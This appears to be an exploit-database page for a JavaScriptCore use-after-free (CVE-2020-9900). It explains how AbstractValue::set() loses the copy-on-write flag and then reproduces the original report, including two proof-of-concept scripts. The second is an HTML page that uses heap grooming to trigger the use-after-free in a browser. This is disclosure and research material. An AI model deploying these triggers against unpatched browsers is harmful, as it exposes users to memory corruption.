header-logo
Suggest Exploit
vendor:
JavaScriptCore
by:
Anonymous
7.8
CVSS
HIGH
Use-After-Free
416
CWE
Product Name: JavaScriptCore
Affected Version From: JavaScriptCore prior to version 13.0.4
Affected Version To: JavaScriptCore version 13.0.4
Patch Exists: YES
Related CWE: CVE-2020-9900
CPE: a:webkit:javascriptcore
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-crashreporter-cve-2020-9900/
Other Scripts: N/A
Platforms Tested: All
2020

AbstractValue::set() Method in JavaScriptCore Allows UaF

The AbstractValue::set() method in JavaScriptCore allows a Use-After-Free vulnerability due to the fact that it works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as writing into an immutable butterfly can be used to bypass write barriers.

Mitigation:

Upgrade to the latest version of JavaScriptCore
Source

Exploit-DB raw data:

<!--
void AbstractValue::set(Graph& graph, RegisteredStructure structure)
{
    RELEASE_ASSERT(structure);
    
    m_structure = structure;

    m_arrayModes = asArrayModes(structure->indexingType());
    m_type = speculationFromStructure(structure.get());
    m_value = JSValue();
    
    checkConsistency();
    assertIsRegistered(graph);
}

It works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as 
writing into an immutable butterfly can be used to bypass write barriers.

I also noticed that the most calls to asArrayModes are using structure->indexingType(). I think that those should be fixed too.

PoC:
-->

// ./jsc --useConcurrentJIT=false ~/test.js

function set(arr, value) {
    arr[0] = value;
}

function getImmutableArrayOrSet(get, value) {
    let arr = [1];
    if (get)
        return arr;

    set(arr, value);  // This inlinee is for having checkArray not take the paths using the structure comparison.
    set({}, 1);
}

function main() {
    getImmutableArrayOrSet(true);

    for (let i = 0; i < 100; i++) {
        getImmutableArrayOrSet(false, {});
    }

    let arr = getImmutableArrayOrSet(true);
    print(arr[0] === 1);
}

main();

PoC 2 (UaF):
<script>

function sleep(ms) {
    let s = new Date();
    while (new Date() - s < ms) {

    }
}

function mark() {
    for (let i = 0; i < 40; i++) {
        new ArrayBuffer(1024 * 1024 * 1);
    }
}

function set(arr, value) {
    arr[0] = value;
}

function getImmutableArrayOrSet(get, value) {
    let arr = [1];
    if (get)
        return arr;

    set(arr, value);
    set({}, 1);
}

function main() {
    getImmutableArrayOrSet(true);

    for (let i = 0; i < 10000; i++)
        getImmutableArrayOrSet(false, {});

    sleep(500);

    let arr = getImmutableArrayOrSet(true);

    mark();
    getImmutableArrayOrSet(false, []);
    mark();

    setTimeout(() => {
        try {
            alert(arr[0]);
        } catch (e) {
            alert(e);
        }
    }, 200);
}

main();

</script>

Navigation

Suggest Exploit

Services By CQR